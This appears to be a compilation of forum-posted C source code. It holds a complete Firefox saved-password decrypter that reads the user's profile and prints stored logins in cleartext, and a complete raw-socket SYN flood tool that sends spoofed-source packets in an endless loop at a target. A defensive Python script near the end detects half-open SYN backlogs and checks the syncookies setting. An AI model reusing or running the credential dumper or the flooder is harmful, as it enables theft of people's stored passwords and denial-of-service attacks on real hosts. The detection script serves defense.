// Description: Firefox Password Cache Decrypter
// Versions: Firefox 1, 2, and 3
// Author: KriPpLer
// Language: C
// Released: 9/9/2008
// URL: http://www.krippler.com/
///////////////////////////////////////////////////////////
// Credit: http://securityxploded.com/ (FF 2 Source)
// Original Source: http://nagmatrix.50webs.com/download/Firepassword_src.zip
////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <userenv.h>
#pragma comment(lib,"userenv.lib")
//-----------------------------------------------------------------------
//Firefox internal SEC structures
typedef enum SECItemType
{
    siBuffer = 0,
    siClearDataBuffer = 1,
    siCipherDataBuffer = 2,
    siDERCertBuffer = 3,
    siEncodedCertBuffer = 4,
    siDERNameBuffer = 5,
    siEncodedNameBuffer = 6,
    siAsciiNameString = 7,
    siAsciiString = 8,
    siDEROID = 9,
    siUnsignedInteger = 10,
    siUTCTime = 11,
    siGeneralizedTime = 12
};
struct SECItem
{
    SECItemType type;
    unsigned char *data;
    unsigned int len;
};
typedef enum SECStatus
{
    SECWouldBlock = -2,
    SECFailure = -1,
    SECSuccess = 0
};
//-----------------------------------------------------------------------
//Removes gecko-sdk dependency
#define PRBool int
#define PRUint32 unsigned int
#define PR_TRUE 1
#define PR_FALSE 0
//Mozilla library names
#define NSS_LIBRARY_NAME "nss3.dll"
#define PLC_LIBRARY_NAME "plc4.dll"
#define NSPR_LIBRARY_NAME "nspr4.dll"
#define SQLITE_LIBRARY_NAME "sqlite3.dll"
#define MOZCRT_LIBRARY_NAME "mozcrt19.dll"
#define NSSU_LIBRARY_NAME "nssutil3.dll"
#define PLDS_LIBRARY_NAME "plds4.dll"
#define SOFTN_LIBRARY_NAME "softokn3.dll"
#define LOADLIBRARY(x) LoadLibrary(x)
#define GETPROCADDRESS GetProcAddress
#define FREELIBRARY FreeLibrary
//-----------------------------------------------------------------------
const int buflen = 10240;
static char readbuf[buflen+1];
static int last = 0;
static int next = 0;
typedef struct PK11SlotInfoStr PK11SlotInfo;
// NSS Library functions
typedef SECStatus (*NSS_Init) (const char *configdir);
typedef SECStatus (*NSS_Shutdown) (void);
typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void);
typedef void (*PK11_FreeSlot) (PK11SlotInfo *slot);
typedef SECStatus (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw);
typedef SECStatus (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx);
typedef SECStatus (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx);
// PLC Library functions
typedef char * (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest);
// Function declarations..
void NSSUnload();
int InitFFLibs(char *firefoxPath);
int InitializeNSSLibrary(char *profilePath, char *password);
int CheckMasterPassword(char *password);
int DirectoryExists( char *path );
void StrLwr(char *str);
int OpenFile(char *filePath);
void CloseFile();
int ReadLine(char *buffer, int size);
char *GetFFProfilePath();
char *GetFFLibPath();
char *GetFFVersion();
char **Explode(char *StrIn,const char *Delimiter);
char *Split(char *String,char Delimeter[],int Part);
char *replace(char *str, const char *substr, const char *repstr);
char ReadChar();
char Vers[_MAX_PATH] = "";
int version = 1;
int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen);
int Base64Decode(char *cryptData, char **decodeData, int *decodeLen);
//-----------------------------------------------------------------------
NSS_Init NSSInit = NULL;
NSS_Shutdown NSSShutdown = NULL;
PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL;
PK11_CheckUserPassword PK11CheckUserPassword = NULL;
PK11_FreeSlot PK11FreeSlot = NULL;
PK11_Authenticate PK11Authenticate = NULL;
PK11SDR_Decrypt PK11SDRDecrypt = NULL;
PL_Base64Decode PLBase64Decode = NULL;
int IsNSSInitialized = 0;
HMODULE libnss = NULL;
HMODULE libplc = NULL;
HMODULE libtmp = NULL;
FILE *signonFile = NULL;
//-----------------------------------------------------------------------
int OpenFile(char *filePath)
{
    last = next = 0;
    signonFile = fopen(filePath, "r");
    if( signonFile == NULL )
    {
        return 0; //fail
    }
    return 1;
}
//-----------------------------------------------------------------------
char ReadChar()
{
    if (next >= last)
    {
        next = 0;
        last = fread(readbuf, 1, buflen, signonFile);
        if (last <= 0 )
        {
            return 0;
        }
    }
    return (readbuf[next++]);
}
//-----------------------------------------------------------------------
int ReadLine(char *buffer, int size)
{
    unsigned int c;
    int strLength = 0, i=0;
    buffer[0] = 0;
    while(1)
    {
        c = ReadChar();
        // eof reached
        if ( c == 0 ) // || feof(file) )
            return 0;
        if (c == '\n')
        {
            buffer[strLength++] = 0;
            break;
        }
        if (c != '\r')
        {
            for(i=0; i < 4 && ( (c & 0xff) != 0 ) ; i++)
            {
                if( strLength >= size )
                {
                    printf("\n Buffer is insufficient to store data");
                    return 0;
                }
                // Increase buffer capacity dynamically
                buffer[strLength++] = (char)c;
                c = c >> 8;
            }
        }
    }
    return 1;
}
//-----------------------------------------------------------------------
//Misc functions
int DirectoryExists( char *path )
{
    DWORD attr = GetFileAttributes(path);
    if( (attr < 0) || !(attr & FILE_ATTRIBUTE_DIRECTORY ) )
    {
        return 0;
    }
    return 1;
}
//-----------------------------------------------------------------------
void StrLwr(char *str)
{
    int n=strlen(str);
    for(int i=0; i<n; i++)
    {
        if( str[i] >=65 && str[i]<=90 )
            str[i]+=32;
    }
}
//-----------------------------------------------------------------------
//Loads specified firefox library with the given ffdir path as root
HMODULE LoadLibrary(char *firefoxDir, char *libName)
{
    char loadPath[4096]="";
    strcpy(loadPath, firefoxDir);
    strcat(loadPath, "/");
    strcat(loadPath, libName);
    libtmp = LOADLIBRARY(loadPath);
    if( !libtmp )
    {
        return 0; //Failed to load library
    }
    return libtmp;
}
//-----------------------------------------------------------------------
int InitFFLibs(char *FFDir)
{
    libnss = libplc = NULL;
    //Load all required dll's
    if( FFDir != NULL )
    {
        //Minor version check
        if(!LoadLibrary(FFDir, MOZCRT_LIBRARY_NAME)) //We are using version 2 or lower
        {
            goto version2;
        }
        else
        {
            if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) )
            {
                if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) )
                {
                    if( LoadLibrary(FFDir, PLC_LIBRARY_NAME) )
                    {
                        if( LoadLibrary(FFDir, NSSU_LIBRARY_NAME) )
                        {
                            if( LoadLibrary(FFDir, SQLITE_LIBRARY_NAME) )
                            {
                            }
                        }
                    }
                }
            }
        }
version2:
        if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) )
        {
            if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) )
            {
                if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) )
                {
                    if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) )
                    {
                        if( LoadLibrary(FFDir, SOFTN_LIBRARY_NAME) )
                        {
                            libnss=LoadLibrary(FFDir, NSS_LIBRARY_NAME);
                            if(libnss )
                                printf("\n\n Librarys loaded from master firefox path successfully");
                        }
                    }
                }
            }
        }
    }
    // Now load from current path.
    if( !libnss )
    {
        libnss =LOADLIBRARY(NSS_LIBRARY_NAME);
        libplc =LOADLIBRARY(PLC_LIBRARY_NAME);
        if( !libnss || !libplc )
        {
            printf("\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME);
            return 0;
        }
    }
    else
    {
        printf("\n Firefox Libraries loaded successfully");
    }
    // Extract the required functions....
    NSSInit = (NSS_Init) GETPROCADDRESS(libnss, "NSS_Init");
    NSSShutdown = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown");
    PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot");
    PK11FreeSlot = (PK11_FreeSlot) GETPROCADDRESS(libnss, "PK11_FreeSlot");
    PK11Authenticate = (PK11_Authenticate) GETPROCADDRESS(libnss, "PK11_Authenticate");
    PK11SDRDecrypt = (PK11SDR_Decrypt) GETPROCADDRESS(libnss, "PK11SDR_Decrypt");
    PK11CheckUserPassword = (PK11_CheckUserPassword ) GETPROCADDRESS(libnss, "PK11_CheckUserPassword");
    if( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword)
    {
        printf("\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME);
        NSSUnload();
        return 0;
    }
    // Get the functions from PLC library
    PLBase64Decode = ( PL_Base64Decode ) GETPROCADDRESS(libplc, "PL_Base64Decode");
    if( !PLBase64Decode )
    {
        printf("\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME);
        NSSUnload();
        return 0;
    }
    else
    {
        printf("\n Firefox library initialized successfully");
    }
    return 1;
}
//-----------------------------------------------------------------------
int InitializeNSSLibrary(char *profilePath)
{
    IsNSSInitialized = 0;
    // Initialize the NSS library
    if( (*NSSInit) (profilePath) != SECSuccess )
    {
        printf("\n\n NSSLib Initialization failed");
        NSSUnload();
        return 0;
    }
    else
    {
        IsNSSInitialized = 1;
        printf("\n NSS library initiliazed successfully");
    }
    return 1;
}
//-----------------------------------------------------------------------
void NSSUnload()
{
    if( IsNSSInitialized && (NSSShutdown != NULL) )
        (*NSSShutdown)();
    if( libnss != NULL )
        FREELIBRARY(libnss); //Free nss library
    if( libplc != NULL )
        FREELIBRARY(libplc); //Free plc library
}
//-----------------------------------------------------------------------
int DecryptStr(char *cryptData, char **clearData)
{
    int decodeLen = 0;
    int finalLen = 0;
    char *decodeData = NULL;
    char *finalData = NULL;
    if( cryptData[0] != NULL )
    {
        if( (Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL) )
        {
            return 0;
        }
        // Do the actual PK11 decryption
        if( (PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL))
        {
            return 0;
        }
        *clearData = (char*) malloc( finalLen + 1 );
        if( *clearData == NULL )
        {
            printf("\n Insufficient memory");
            return 0;
        }
        memcpy(*clearData, finalData, finalLen);
        *(*clearData + finalLen) = 0; // Null terminate string
        return 1;
    }
    if( Base64Decode(cryptData, clearData, &decodeLen) == 0 )
    {
        return 0;
    }
    return 1;
}
//-----------------------------------------------------------------------
int Base64Decode(char *cryptData, char **decodeData, int *decodeLen)
{
    int len = strlen( cryptData );
    int adjust = 0;
    if (cryptData[len-1] == '=')
    {
        adjust++;
        if (cryptData[len-2] == '=')
            adjust++;
    }
    *decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL);
    if( *decodeData == NULL )
    {
        return 0;
    }
    *decodeLen = (len*3)/4 - adjust;
    return 1;
}
//-----------------------------------------------------------------------
int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen)
{
    PK11SlotInfo *slot = 0;
    SECStatus status;
    SECItem request;
    SECItem reply;
    // Find token with SDR key
    slot = (*PK11GetInternalKeySlot)();
    if (!slot)
    {
        return 0;
    }
    // Decrypt the string
    request.data = (unsigned char *)decodeData;
    request.len = decodeLen;
    reply.data = 0;
    reply.len = 0;
    status = (*PK11SDRDecrypt)(&request, &reply, NULL);
    if (status != SECSuccess)
    {
        return 0;
    }
    *clearData = (char*)reply.data;
    *finalLen = reply.len;
    // Free the slot
    (*PK11FreeSlot)(slot);
    return 1;
}
//-----------------------------------------------------------------------
int DumpCache(char *profilePath,char *signonFile)
{
    char buffer[10240];
    char sbuffer[10240];
    char name[10240];
    char *clearData = NULL;
    int bufferLength = 10240;
    int count = 0;
    int ret;
    if( profilePath == NULL || signonFile == NULL)
    {
        return 0;
    }
    strcpy(sbuffer,profilePath);
    strcat(sbuffer,"\\");
    strcat(sbuffer,signonFile);
    if(OpenFile(sbuffer) == 0 ) // Open the signon file
    {
        printf("\n\n Failed to open signon file: [%s], skipped. ", signonFile);
        return 0;
    }
    else
    {
        printf("\n\n ============================================================== ");
        printf("\n = %s = ",signonFile);
        printf("\n ============================================================== ");
        /*/////////////////////////////////////////
        Begin cache dump
        *//////////////////////////////////////////
        printf("\n\n ======================= Unmanaged URLS ======================= ");
        // Read out the unmanaged ("Never remember") URL list
        ReadLine(buffer, bufferLength); //Skip first line as its a useless version tag
        while (ReadLine(buffer, bufferLength) != 0)
        {
            // End of unmanaged list
            if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#')
                break;
            printf("\n %s ", buffer);
        }
        printf("\n ======================== Managed URLS ========================\n");
        // read the URL line
        while (ReadLine(buffer, bufferLength) != 0 ){
            printf("\n URL: %s ", buffer);
            //Start looping through final signon*.txt file
            while (ReadLine(buffer, bufferLength) != 0 )
            {
                if (buffer[0] == '.')
                {
                    printf("\n ==============================================================\n");
                    break; // end of cache entry
                }
                //Check if its a password
                if (buffer[0] == '*')
                {
                    strcpy(name,&buffer[1]);
                    ret = ReadLine(buffer, bufferLength);
                }
                else
                {
                    printf("\n");
                    strcpy(name, buffer);
                    ret = ReadLine(buffer, bufferLength);
                }
                if( DecryptStr(buffer, &clearData) == 1 )
                {
                    printf("\n %s: %s ", name, clearData);
                    clearData = NULL;
                }
            }
        }
        printf("\n\n ============================================================== ");
        printf("\n = END %s = ",signonFile);
        printf("\n ============================================================== \n");
        return 1;
    }
    /*/////////////////////////////////////////
    End cache dump
    *//////////////////////////////////////////
}
//-----------------------------------------------------------------------
// Find firefox path / libraries
char *GetFFLibPath()
{
    char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
    char path[_MAX_PATH] ="";
    char *FFDir = NULL;
    DWORD pathSize = _MAX_PATH;
    DWORD valueType;
    HKEY rkey;
    // Open firefox registry key
    if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
    {
        printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
        return NULL;
    }
    // Read the firefox path
    if( RegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS )
    {
        printf("\n Failed to read the firefox path value from registry ");
        RegCloseKey(rkey);
        return NULL;
    }
    if( pathSize <= 0 || path[0] == 0)
    {
        printf("\n Unable to locate firefox installation path");
        RegCloseKey(rkey);
        return NULL;
    }
    RegCloseKey(rkey);
    // Remove extra quotes
    if( path[0] == '\"' )
    {
        for(int i=0; i < strlen(path)-1 ; i++)
            path[i] = path[i+1];
    }
    printf("\n Firefox main exe: %s", path);
    // Terminate the string at last "\\"
    for(int j=strlen(path)-1; j>0; j--)
    {
        if( path[j] == '\\' )
        {
            path[j]=0;
            break;
        }
    }
    FFDir = (char*) malloc( strlen(path) + 1);
    if(FFDir)
        strcpy(FFDir, path);
    printf("\n Firefox path: %s", FFDir);
    return FFDir;
}
//-----------------------------------------------------------------------
char *GetFFProfilePath()
{
    char profilePath[_MAX_PATH] = "";
    char partialPath[] = "Application Data\\Mozilla\\Firefox";
    char profileFile[_MAX_PATH];
    char line[1024];
    DWORD pathSize = _MAX_PATH;
    char *finalProfilePath = NULL;
    int isDefaultFound = 0;
    HANDLE token;
    // Get current user's profile directory
    if( OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE )
    {
        printf("\n Failed to get current process token ");
        return NULL;
    }
    if( GetUserProfileDirectory(token, profilePath, &pathSize) == FALSE )
    {
        printf("\n Failed to get user profile directory");
        return NULL;
    }
    printf("\n User Profile directory: %s\n", profilePath);
    // Get firefox profile directory
    strcpy(profileFile, profilePath);
    strcat(profileFile,"\\");
    strcat(profileFile,partialPath);
    strcat(profileFile,"\\profiles.ini");
    // Open the firefox profile setting file
    FILE *profile = fopen(profileFile, "r");
    if( profile == NULL )
    {
        printf("\n Unable to find firefox profile file: %s ", profileFile);
        return NULL;
    }
    // This indicates that we are looking under default profile
    while(fgets(line, 1024, profile))
    {
        StrLwr(line);
        if( !isDefaultFound && ( strstr(line, "name=default") != NULL) )
        {
            isDefaultFound = 1;
            continue;
        }
        // Found default profile / check for path
        if( isDefaultFound )
        {
            if( strstr(line,"path=") != NULL)
            {
                char *slash = strstr(line,"/");
                if( slash != NULL )
                    *slash = '\\';
                // remove \n from the end of line
                line[strlen(line)-1] = 0;
                char *start = strstr(line,"=");
                int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ;
                finalProfilePath = (char *) malloc(totalLen);
                if( finalProfilePath )
                {
                    strcpy(finalProfilePath,profilePath);
                    strcat(finalProfilePath,"\\");
                    strcat(finalProfilePath,partialPath);
                    strcat(finalProfilePath,"\\");
                    strcat(finalProfilePath,start+1);
                    printf("\n Final profile path: %s \n", finalProfilePath);
                }
                break;
            }
        }
    }
    fclose(profile);
    return finalProfilePath;
}
//-----------------------------------------------------------------------
char *GetFFVersion()
{
    char regSubKey[] = "SOFTWARE\\Mozilla\\Mozilla Firefox";
    char *FFVers = NULL;
    DWORD pathSize = _MAX_PATH;
    DWORD valueType;
    HKEY rkey;
    // Open firefox registry key
    if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
    {
        printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
        return NULL;
    }
    // Read the firefox version value
    if( RegQueryValueEx(rkey, "CurrentVersion", 0, &valueType, (unsigned char*)&Vers, &pathSize) != ERROR_SUCCESS )
    {
        printf("\n Failed to read the firefox version from registry ");
        RegCloseKey(rkey);
        return NULL;
    }
    if( pathSize <= 0 || Vers[0] == 0)
    {
        printf("\n Path value read from the registry is empty");
        RegCloseKey(rkey);
        return NULL;
    }
    RegCloseKey(rkey);
    FFVers = (char*) malloc( strlen(Vers) + 1);
    if( FFVers )
        strcpy(Vers,FFVers);
    if (FFVers[1] == '1')
    {
        version = 1;
    }else{
        if (FFVers[1] == '2')
        {
            version = 2;
        }else{
            if (FFVers[1] == '3')
            {
                version = 3;
            }
        }
    }
    printf("\n Firefox version: %d", version);
    return (FFVers);
}
//-----------------------------------------------------------------------
int main(int argc, char* argv[])
{
    char *ProfilePath = NULL; //Profile path
    char *FFDir = NULL; //Firefox main installation path
    char buff[1024];
    ProfilePath = GetFFProfilePath();
    if( !DirectoryExists(ProfilePath))
    {
        printf("\n\n Firefox profile directory does not exist or no profiles found. \n");
        return 0;
    }
    FFDir = GetFFLibPath();
    if( !DirectoryExists(ProfilePath))
    {
        printf("\n\n Firefox installation path does not exist or is not installed. \n");
        return 0;
    }
    if( InitFFLibs(FFDir) )
    {
        if( InitializeNSSLibrary(ProfilePath) )
        {
            //Take 3 Mozilla dumps
            DumpCache(ProfilePath,"signons.txt");
            DumpCache(ProfilePath,"signons2.txt");
            DumpCache(ProfilePath,"signons3.txt");
            //DumpCache(ProfilePath,"signons.sqlite");
            //Dont forget to flush :/
            NSSUnload();
        }
    }
    printf("\n ======================= End Cache Dump =======================\n");
    while(1){
        Sleep(10000); //Just loop until user exits
    }
}
//-----------------------------------------------------------------------

Source: LeetCoders
-
[GNU Linux C] SYN Flooder source
Author: jakash3 (I think)
C source code for Linux for sending multiple SYN-flagged TCP/IP packets with spoofed source addresses to spawn half-open fake connections with TCP hosts. A form of DoS attack using IPv4 addressing that may still work against hosts without SYN cookies enabled. Using raw TCP IPv4 sockets, it sends packets in the form of an IP header and an appended TCP header with no initial data. The checksum for the IP header is calculated over the IP header only, while the checksum for the TCP header is calculated over the TCP pseudo-header concatenated with the actual TCP header and data.

synflood.c

#include "tcpip.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <signal.h>
#include <errno.h>
ushort csum(short* data, int len);
char* randip(char* dst);
ushort rand16();
uint rand32();
int sd;
void help() {
    printf("SYN flooder - by Jakash3\nArguments: IPV4_ADDR PORT\n");
    exit(1);
}
void quit(int sig) {
    close(sd);
    exit(0);
}
int main(int argc, char** argv) {
    if (argc!=3) help();
    /* Map CTRL-C to quit() */
    struct sigaction sa;
    sa.sa_handler = &quit;
    sa.sa_flags = 0;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGINT, &sa, 0);
    char rip[16];
    char packet[4096];
    struct iphdr ip;
    struct tcpph tph;
    struct tcphdr tcp;
    struct sockaddr_in sin;
    const int on = 1;
    memset(&packet, 0, 40);
    ip.ihl = 5;
    ip.ipv = 4;
    ip.tos = 0;
    ip.len = IPHDR_LEN + TCPHDR_LEN;
    ip.id = htons(rand16());
    ip.ttl = 64;
    ip.proto = IPPROTO_TCP;
    ip.src = (uint)inet_addr(randip(rip));
    ip.dst = (uint)inet_addr(argv[1]);
    ip.chksum = 0;
    ip.chksum = csum((short*)&ip, IPHDR_LEN);
    tcp.sport = htons((short)atoi(argv[2]));
    tcp.dport = htons((short)atoi(argv[2]));
    tcp.seq = htonl(rand32());
    tcp.offset = sizeof(struct tcphdr) / 4;
    tcp.flgs = TCP_SYN;
    tcp.chksum = 0;
    tph.src = ip.src;
    tph.dst = ip.dst;
    tph.zero = 0;
    tph.proto = IPPROTO_TCP;
    tph.tcp_len = sizeof(struct tcphdr);
    memmove(packet, &tph, TCPPH_LEN);
    memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN);
    tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN);
    memmove(packet, &ip, IPHDR_LEN);
    memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN);
    sd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
    if (sd == -1) {
        printf("Failed to create socket. Error code: %d\n", errno);
        exit(1);
    }
    if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1) {
        printf("Failed to set socket options. Error code: %d\n", errno);
        exit(1);
    }
    sin.sin_family = AF_INET;
    sin.sin_port = htons(tcp.dport);
    memmove(&(sin.sin_addr), &(ip.dst), sizeof(struct in_addr));
    while (1) {
        if (sendto(sd, packet, ip.len, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
            printf("Failed to send SYN packet(s). Error code: %d\n", errno);
            exit(1);
        } else {
            printf("Sent SYN packet with spoofed ip: %s\n", rip);
        }
        ip.id = htons(rand16());
        ip.src = (uint)inet_addr(randip(rip));
        ip.chksum = 0;
        ip.chksum = csum((short*)&ip, IPHDR_LEN);
        tph.src = ip.src;
        tcp.seq = htonl(rand32());
        tcp.chksum = 0;
        memmove(packet, &tph, TCPPH_LEN);
        memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN);
        tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN);
        memmove(packet, &ip, IPHDR_LEN);
        memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN);
    }
}
ushort csum(short* data, int len) {
    int sum = 0;
    for (; len > 1; len -= 2) sum += *data++;
    if (len == 1) sum += *(uchar*)data;
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return ~sum;
}
/* The best I can do for generating a random ipv4 address */
char* randip(char* dst) {
    dst[0] = 0;
    int i, j, k;
    srandom(time(0));
    srand(random());
    srandom(rand());
    j = rand() + random();
    for (i = 0, k = 0; k < 4; i += strlen(dst + i), k++, j += ((rand() + (int)dst) % i) ^ time(0)) {
        srand((int)dst + i + k);
        srand(j + dst[i+k] + (int)&i + rand());
        j = rand() % 255;
        sprintf(dst + i, "%d.", j);
    }
    dst[i-1] = 0;
    return dst;
}
ushort rand16() {
    srandom(time(0));
    srand(random());
    srandom(rand());
    return (random() + rand() + time(0)) % 65535;
}
uint rand32() {
    srandom(time(0));
    srand(random());
    srandom(rand());
    return (random() + rand() & time(0));
}

tcpip.h

#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
typedef unsigned char uchar;
typedef unsigned short ushort;
typedef unsigned int uint;
/* Internet Datagram Header */
#define IPHDR_LEN 20
struct iphdr {
    uchar ipv:4;        /* Internet Protocol Version */
    uchar ihl:4;        /* Header length (in DWORDs) */
    uchar tos;          /* Type of Service */
    ushort len;         /* Total length */
    ushort id;          /* Identification number */
    ushort frag;        /* Fragment offset and flags */
    uchar ttl;          /* Time to live */
    uchar proto;        /* Protocol type */
    ushort chksum;      /* Checksum */
    uint src;           /* Source IP Address */
    uint dst;           /* Destination IP Address */
};
/* TCP Header */
#define TCPHDR_LEN 20
struct tcphdr {
    ushort sport;       /* Source Port */
    ushort dport;       /* Destination Port */
    uint seq;           /* Sequence number */
    uint ack;           /* Acknowledgement number */
    uchar reserved:4;
    uchar offset:4;     /* Size of TCP Header in DWORDs */
    uchar flgs;         /* TCP Flags */
#define TCP_FIN 0x01
#define TCP_SYN 0x02
#define TCP_RST 0x04
#define TCP_PSH 0x08
#define TCP_ACK 0x10
#define TCP_URG 0x20
    ushort win;         /* Window. Size of data to accept */
    ushort chksum;      /* Checksum */
    ushort urgp;        /* Urgent pointer */
};
/* TCP Pseudo-header */
#define TCPPH_LEN 12
struct tcpph {
    uint src;
    uint dst;
    uchar zero;
    uchar proto;
    ushort tcp_len;
};

Source: LeetCoders
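A defender-side counterpart to the attack described above, added here and not part of jakash3's post: it parses netstat-style connection lines (a constructed sample, not a real capture), flags local ports whose SYN_RECV backlog is large and spread over many distinct peer addresses (the spoofed-source pattern the post describes), and interprets the net.ipv4.tcp_syncookies sysctl that the post names as the mitigation. The thresholds, line format and sample addresses are assumptions.

```python
"""Half-open (SYN_RECV) backlog monitor for the SYN flood pattern described above."""
import re
from collections import defaultdict

# Assumed netstat -nt style line: proto recv-q send-q local:port peer:port state
LINE_RE = re.compile(
    r"^tcp\s+\d+\s+\d+\s+(?P<laddr>[\d.]+):(?P<lport>\d+)\s+"
    r"(?P<raddr>[\d.]+):(?P<rport>\d+)\s+(?P<state>\S+)\s*$")


def parse_connections(text):
    """Parse netstat-style lines into dicts; header and unparsable lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["lport"] = int(d["lport"])
            conns.append(d)
    return conns


def half_open_stats(conns):
    """Per local port: number of SYN_RECV entries and the set of distinct peer addresses."""
    stats = defaultdict(lambda: {"half_open": 0, "sources": set()})
    for c in conns:
        if c["state"] == "SYN_RECV":
            s = stats[c["lport"]]
            s["half_open"] += 1
            s["sources"].add(c["raddr"])
    return stats


def detect_syn_flood(conns, threshold=16, min_source_ratio=0.8):
    """Return (port, half_open, distinct_sources) for ports whose half-open backlog
    is at least `threshold` and mostly made up of distinct peers, which is what a
    flood with randomised spoofed source addresses looks like from the victim side."""
    alerts = []
    for port, s in half_open_stats(conns).items():
        if s["half_open"] >= threshold:
            ratio = len(s["sources"]) / s["half_open"]
            if ratio >= min_source_ratio:
                alerts.append((port, s["half_open"], len(s["sources"])))
    return sorted(alerts)


def syncookies_enabled(sysctl_output):
    """Interpret 'net.ipv4.tcp_syncookies = N' text; 1 (on under pressure) and
    2 (always on) both mean the kernel can answer SYNs without keeping state."""
    m = re.search(r"net\.ipv4\.tcp_syncookies\s*=\s*(\d)", sysctl_output)
    return m is not None and m.group(1) in ("1", "2")


def build_sample():
    """Constructed snapshot: normal traffic on 443, a spoofed-source flood on 80.
    Peer addresses come from the documentation ranges (198.51.100/24, 203.0.113/24)."""
    lines = ["Proto Recv-Q Send-Q Local Address Foreign Address State",
             "tcp        0      0 10.0.0.5:443    198.51.100.23:51234  ESTABLISHED",
             "tcp        0      0 10.0.0.5:443    198.51.100.24:51235  SYN_RECV",
             "tcp        0      0 10.0.0.5:80     198.51.100.40:60001  ESTABLISHED"]
    # 40 half-open entries on port 80, each from a different address
    for i in range(40):
        lines.append(f"tcp        0      0 10.0.0.5:80     203.0.113.{i + 1}:{41000 + i}  SYN_RECV")
    return "\n".join(lines)


if __name__ == "__main__":
    conns = parse_connections(build_sample())
    for port, half_open, distinct in detect_syn_flood(conns):
        print(f"port {port}: {half_open} half-open connections from {distinct} distinct sources")
    print("syncookies:", syncookies_enabled("net.ipv4.tcp_syncookies = 1"))
```

On a live host the same functions can be fed the output of `netstat -nt` and `sysctl net.ipv4.tcp_syncookies`.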